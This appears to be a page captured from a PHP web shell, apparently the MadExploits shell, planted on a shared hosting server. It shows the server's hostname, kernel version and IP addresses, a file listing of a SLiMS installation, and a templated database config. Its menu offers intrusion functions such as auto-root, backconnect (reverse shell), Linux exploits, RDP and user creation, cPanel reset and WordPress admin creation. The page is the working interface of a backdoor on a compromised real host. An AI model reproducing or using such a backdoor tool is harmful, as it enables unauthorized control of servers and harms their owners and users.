Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
slims /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
5.87
KB
-rw-r--r--
clone.php
5.07
KB
-rw-r--r--
database.php
916
B
-rw-r--r--
edit.php
4.25
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
env.php
921
B
-rw-r--r--
extend.php
8.78
KB
-rw-r--r--
fileindex.php
393
B
-rw-r--r--
import.php
3.74
KB
-rw-r--r--
info.xml
3.74
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.82
KB
-rw-r--r--
install.xml
1.38
KB
-rw-r--r--
md5
1.51
KB
-rw-r--r--
notes.txt
480
B
-rw-r--r--
slims.sql
111.36
KB
-rw-r--r--
slims.zip
49.98
MB
-rw-r--r--
update_pass.php
257
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.php
<?php return [ /** * Default database node profile */ 'default_profile' => 'SLiMS', /** * SLiMS as Service, One SLiMS for many library * ---------------------------------------------------- * * Switching database node access based on rule, * such as domain, ip, port etc * * How to : * 1. make file with name database_proxy.php in config/ * 2. make your own rule in that file. * 3. change this value to true */ 'proxy' => false, /** * Nodes profile */ 'nodes' => [ 'SLiMS' => [ 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'port' => 3306, 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'options' => [ 'storage_engine' => 'MyISAM' ] ], // add more here ] ];
Close